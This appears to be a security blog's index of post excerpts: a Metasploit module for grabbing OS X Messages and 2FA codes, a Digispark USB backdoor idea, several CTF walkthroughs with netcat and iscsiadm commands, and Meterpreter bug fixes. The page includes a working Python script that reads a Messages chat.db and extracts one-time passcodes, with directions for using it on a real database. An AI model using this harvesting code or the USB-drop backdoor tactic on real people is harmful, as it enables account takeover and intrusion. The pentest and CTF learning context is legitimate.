Geckom: security enthusiast. Programmer by day and infosec enthusiast by night, tinkering with various software and electronics.
Owning 2FA with OSX messages and metasploit

My new metasploit module, submitted today, has two great advantages. Firstly, it can download all messages from an OS X machine, which by default syncs with the user's iPhone and therefore also holds their SMS messages. Secondly, the LATEST action grabs the most recent messages in an easy to read format, which is particularly useful for harvesting two-factor authentication (2FA) codes. Read more.
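The technique behind the LATEST action is a plain SQLite query: Messages keeps everything in ~/Library/Messages/chat.db, so "newest messages" is an ORDER BY on the message table joined to the handle that sent them. The following is an added example, not the module's own code. It builds a constructed in-memory database that reuses the column names a real chat.db has (message.text, message.date, message.handle_id, message.is_from_me, handle.id) and omits everything else; the date decoding (nanoseconds on newer macOS, seconds on older) and the "looks like an OTP" heuristic are assumptions of this example, not claims about the module.

```python
"""Read the newest rows from a Messages chat.db and pick out likely 2FA codes.

Added example, not the metasploit module's code. The constructed in-memory
database below uses the same column names a real ~/Library/Messages/chat.db
has (message.text, message.date, message.handle_id, message.is_from_me,
handle.id); indexes and the many other columns are omitted.
"""
import re
import sqlite3
from datetime import datetime, timedelta, timezone

MAC_EPOCH = datetime(2001, 1, 1, tzinfo=timezone.utc)

SCHEMA = """
CREATE TABLE handle (ROWID INTEGER PRIMARY KEY, id TEXT);
CREATE TABLE message (ROWID INTEGER PRIMARY KEY, text TEXT, handle_id INTEGER,
                      date INTEGER, is_from_me INTEGER);
"""


def to_mac_ns(dt):
    """UTC datetime -> nanoseconds since 2001-01-01 (newer chat.db encoding)."""
    return int((dt - MAC_EPOCH).total_seconds()) * 10**9


def mac_date(value):
    """chat.db 'date' -> UTC datetime. Assumption: values above 1e12 are
    nanoseconds (newer macOS); anything smaller is whole seconds (older)."""
    if value > 10**12:
        value //= 10**9
    return MAC_EPOCH + timedelta(seconds=value)


def build_sample_db():
    """Constructed sample: one outgoing text, one reply, one SMS 2FA code."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO handle VALUES (?, ?)",
                     [(1, "+15555550100"), (2, "12345")])
    base = datetime(2016, 7, 1, 10, 0, tzinfo=timezone.utc)
    rows = [
        (1, "see you at 6", 1, to_mac_ns(base), 1),
        (2, "call me back on 0412 345 678", 1,
         to_mac_ns(base + timedelta(minutes=1)), 0),
        (3, "Your verification code is 482913. It expires in 10 minutes.", 2,
         to_mac_ns(base + timedelta(minutes=5)), 0),
    ]
    conn.executemany("INSERT INTO message VALUES (?, ?, ?, ?, ?)", rows)
    conn.commit()
    return conn


def latest_messages(conn, count=5):
    """Newest `count` messages, newest first, with the sender resolved."""
    rows = conn.execute(
        "SELECT h.id, m.text, m.date, m.is_from_me FROM message m "
        "LEFT JOIN handle h ON h.ROWID = m.handle_id "
        "ORDER BY m.date DESC LIMIT ?", (count,)).fetchall()
    return [{"from": "me" if is_me else (sender or "?"),
             "text": text or "",
             "date": mac_date(date)}
            for sender, text, date, is_me in rows]


CODE_RE = re.compile(r"\b\d{4,8}\b")
HINT_RE = re.compile(r"\b(code|verification|passcode|otp)\b", re.I)


def find_2fa_codes(conn, count=20):
    """(sender, code) pairs for incoming messages that look like OTP delivery.
    The keyword hint and the 4-8 digit rule are heuristics of this example."""
    hits = []
    for msg in latest_messages(conn, count):
        if msg["from"] == "me" or not HINT_RE.search(msg["text"]):
            continue
        for code in CODE_RE.findall(msg["text"]):
            hits.append((msg["from"], code))
    return hits


if __name__ == "__main__":
    db = build_sample_db()
    for m in latest_messages(db, 3):
        print(m["date"].isoformat(), m["from"], m["text"])
    print("2FA codes:", find_2fa_codes(db))
```

Against a real chat.db you would replace build_sample_db() with sqlite3.connect(path) on a copy of the file (Messages keeps it open, so copy first). The defensive takeaway is the same one the module demonstrates: SMS codes that land on a synced Mac are only as safe as that Mac's user session.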

DigiDucky - How to setup a Digispark like a rubber ducky

The rubber ducky from Hak5 has always interested me but being a cheapskate I didn’t want to spend the USD$40 on buying one when I think of them as potentially throw away devices. In a real world penetration test I visualise dropping a bunch of “USB Drives” around a business and having them install a backdoor automatically upon insertion. My solution to this problem is the DigiSpark which can be bought for as little as $5 each. Read more.

Breach 2 Walkthrough

Breach 2 is a frustratingly fun CTF and I hated loving every minute of it. It is a continuation of the Breach series; however, there is no requirement to complete Breach 1 before starting this VM. This CTF has a good mix of client-side and server-side exploitation and has a few things I have not seen in any other VM on VulnHub. Read more.

PwnLabs Init Walkthrough

PwnLab: init is meant to be an easy CTF challenge made by Claor with the end goal to get the flag contained in /root/flag.txt. My personal challenge for this CTF was to do it entirely in the terminal - no GUI tools. It appears to start off with a webpage containing a Login and an Upload page. I suspect that like a lot of challenges I have seen recently it is going to start at least with a web exploit of some type. Read more.

Tommy Boy CTF VM Walkthrough

Tommy Boy VM is a CTF based on the movie Tommy Boy and the fictitious company "Callahan Auto" in the movie. I found this VM to have a good mix of challenges and I enjoyed every moment of it. Read more.

Getting backups from NAS iSCSI

Today I was looking at a CTF challenge that included a NAS. A quick Nmap showed the following: After going over SSH and FTP it was time to investigate the iSCSI port, something I haven't had to do before. A quick google turned up the popular Hacking Team breach that I remember reading about (http://pastebin.com/raw/0SNSvyjJ). After a quick port forward:

    root@kali:~# iscsiadm -m discovery -t sendtargets -p 127.0.0.1
    192.168.0.3:3260,1 iqn.2016-05.uk.common:storage.lun0

Followed by:

    root@kali:~# iscsiadm -m node --targetname=iqn.2016-05.uk.common:storage.lun0 -p 192.168.0.3 --login
    Logging in to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] (multiple)
    Login to [iface: default, target: iqn.2016-05.uk.common:storage.lun0, portal: 192.168.0.3,3260] successful.

Then... Read more.

Necromancer Walkthrough

After hearing Xerubus talk about his new CTF VM, I thought I might give it a download and have a go. As it turns out, it is one of the best capture the flag virtual machines I have come across in some time. It has a good mix of both skills and difficulties.

Flag 1

After finding the IP address of the new VM image as 10.0.2.11 I ran an Nmap scan, which showed no results. Weird. Next I opened Wireshark with ip.src==10.0.2.11 and saw the VM trying to connect on port 4444:

    nc -lvp 4444
    listening on [any] 4444 ...
    10.0.2.11: inverse host...

Read more.

Metasploit - Python Meterpreter stability

Today I noticed that Meterpreter on OS X was consistently crashing on a test machine. After a bit of debugging, it seemed to be that particular machine or python version didn't like the "SystemConfiguration" reference. I also noticed that a section of code referencing "has_osxsc" is no longer used anywhere. A fixed PR was submitted to Rapid7. Details: https://github.com/rapid7/metasploit-payloads/pull/103 Read more.

Metasploit - Python reverse SSL shell protocol error

Found a bug with metasploit's python meterpreter. When it tries to use SSL to stage a full meterpreter, the connection drops and you get a "protocol error" message. It turns out the new line in the full meterpreter code being sent is killing the connection because of the use of the "send" method. Upgrading this to use the "sendall" method fixes the issue, and the python meterpreter is fully staged correctly without any crashes. Details at https://github.com/rapid7/metasploit-framework/pull/6897 Read more.